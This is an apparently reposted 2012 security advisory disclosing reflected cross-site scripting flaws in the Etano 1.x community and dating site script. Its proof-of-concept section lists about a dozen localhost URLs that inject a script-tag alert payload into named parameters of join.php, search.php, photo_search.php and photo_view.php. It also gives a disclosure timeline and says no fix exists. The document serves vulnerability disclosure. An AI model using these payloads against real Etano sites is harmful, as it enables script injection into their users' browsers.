Etano 1.x Cross Site Scripting

2012.03.06
Credit: Aung Khant
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

1. OVERVIEW Etano 1.x versions are vulnerable to Cross Site Scripting. 2. BACKGROUND The community builder script we provide - Etano - was built entirely based on requests from customers of our previous dating package (Dating Site Builder). Almost every feature ever requested was built into Etano to help you build a better site for your community members. You can use Etano to start up a dating site, a social networking site, a classifieds site or any other type of site involving groups of people, companies, products. 3. VULNERABILITY DESCRIPTION Multiple parameters were not properly sanitized upon submission to join.php, search.php, photo_search.php and photo_view.php , which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. 4. VERSIONS AFFECTED Tested in 1.x versions (1.20-1.22) 5. PROOF-OF-CONCEPT/EXPLOIT URL: http://localhost/etano/join.php Method: POST Vulnerable Parameters: user, email, email2, f17_zip, agree ------------------------------------------------------------------------------------------------ URL: http://localhost/etano/search.php Method: GET Vulnerable Parameters: QUERY STRING, st, f17_city,f17_country , f17_state, f17_zip, f19, wphoto, search, v, return http://localhost/etano/search.php?'"><script>alert(/XSS/)</script> http://localhost/etano/search.php?st='"><script>alert(/XSS/)</script> http://localhost/etano/search.php?f17_city='"><script>alert(/XSS/)</script>&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1 http://localhost/etano/search.php?f17_city=0&f17_country='"><script>alert(/XSS/)</script>&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1 http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state='"><script>alert(/XSS/)</script>&f17_zip=3&f19=0&st=basic&wphoto=1 http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip='"><script>alert(/XSS/)</script>&f19=0&st=basic&wphoto=1 http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19='"><script>alert(/XSS/)</script>&st=basic&wphoto=1 http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st='"><script>alert(/XSS/)</script>&wphoto=1 http://localhost/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto='"><script>alert(/XSS/)</script> http://localhost/etano/search.php?search='"><script>alert(/XSS/)</script>&v=g http://localhost/etano/search.php?search=51d43831f5dde83a4eedb23895f165f6&v='"><script>alert(/XSS/)</script> http://localhost/etano/search.php?st=xss"><script>alert(/XSS/)</script>&user=unknown ------------------------------------------------------------------------------------------------ URL: http://localhost/etano/photo_search.php Method: GET Vulnerable Parameters: QUERY STRING, st, return http://localhost/etano/photo_search.php?'"><script>alert(/XSS/)</script> http://localhost/etano/photo_search.php?st='"><script>alert(/XSS/)</script> ------------------------------------------------------------------------------------------------ URL: http://localhost/etano/photo_view.php Method: GET Vulnerable Parameter: return http://localhost/etano/photo_view.php?photo_id=1&return="><script>alert(/XSS/)</script> 6. SOLUTION The vendor hasn't released the fixed yet. 7. VENDOR Datemill http://www.datemill.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-06-21: notified vendor 2012-03-05: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Betano_1.2.x%5D_xss #yehg [2012-03-05]

References:

http://www.datemill.com/
http://yehg.net/lab/pr0js/advisories/%5Betano_1.2.x%5D_xss


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top